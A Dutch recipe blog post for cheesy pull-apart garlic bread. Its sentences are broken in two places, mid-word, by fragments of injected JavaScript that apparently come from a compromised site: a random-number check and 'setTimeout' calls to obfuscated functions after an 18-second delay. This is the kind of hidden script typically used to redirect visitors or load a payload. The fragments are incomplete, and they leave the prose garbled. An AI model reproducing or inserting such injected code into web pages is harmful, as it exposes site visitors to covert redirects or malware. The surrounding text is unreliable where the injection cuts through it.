Waarschijnlijk hebben jullie dit knoflookbrood al wel eens op Pinterest of Facebook gezien. Maar heb je hem al eens echt zelf gemaakt? Ik heb het geprobeerd en moet eerlijk dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toegeven; het is een echte aanrader voor bij de borrel en ook nog eens low budget!
Facebook staat er vol mee, allemaal makkelijke en snelle recepten. Altijd leuk om wat inspiratie op te doen en vaak erg verassend en creatief gevonden. Wel vind ik veel van de gerechten erg vettig. Er wordt doorgaans veel kaas, boter en suiker gebruikt. Dat maakt het waarschijnlijk super lekker, maar niet al te gezond. Dit knoflookbrood met kaas zit er een beetje tussen in. Niet heel ongezond, maar Sonja zal er vast niet blij mee zijn.
Het enige wat je nodig hebt is een ongesneden brood, geraspte kaas, knoflook en wat olijfolie. Snijd het brood in, maar zorg dat je hem niet doorsnijd. Je kunt het brood nu vullen met wat geperste knoflook en kaas. Zet de oven op een lage temperatuur (110 graden) zodat de kaas langzaam smelt, maar het brood niet té knapperig wordt. Anders heb je zo een grote croudom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}ton afgebakken. Je knoflookbrood is klaar, smullen maar!
Geen Reacties op "Knoflookbrood met kaas"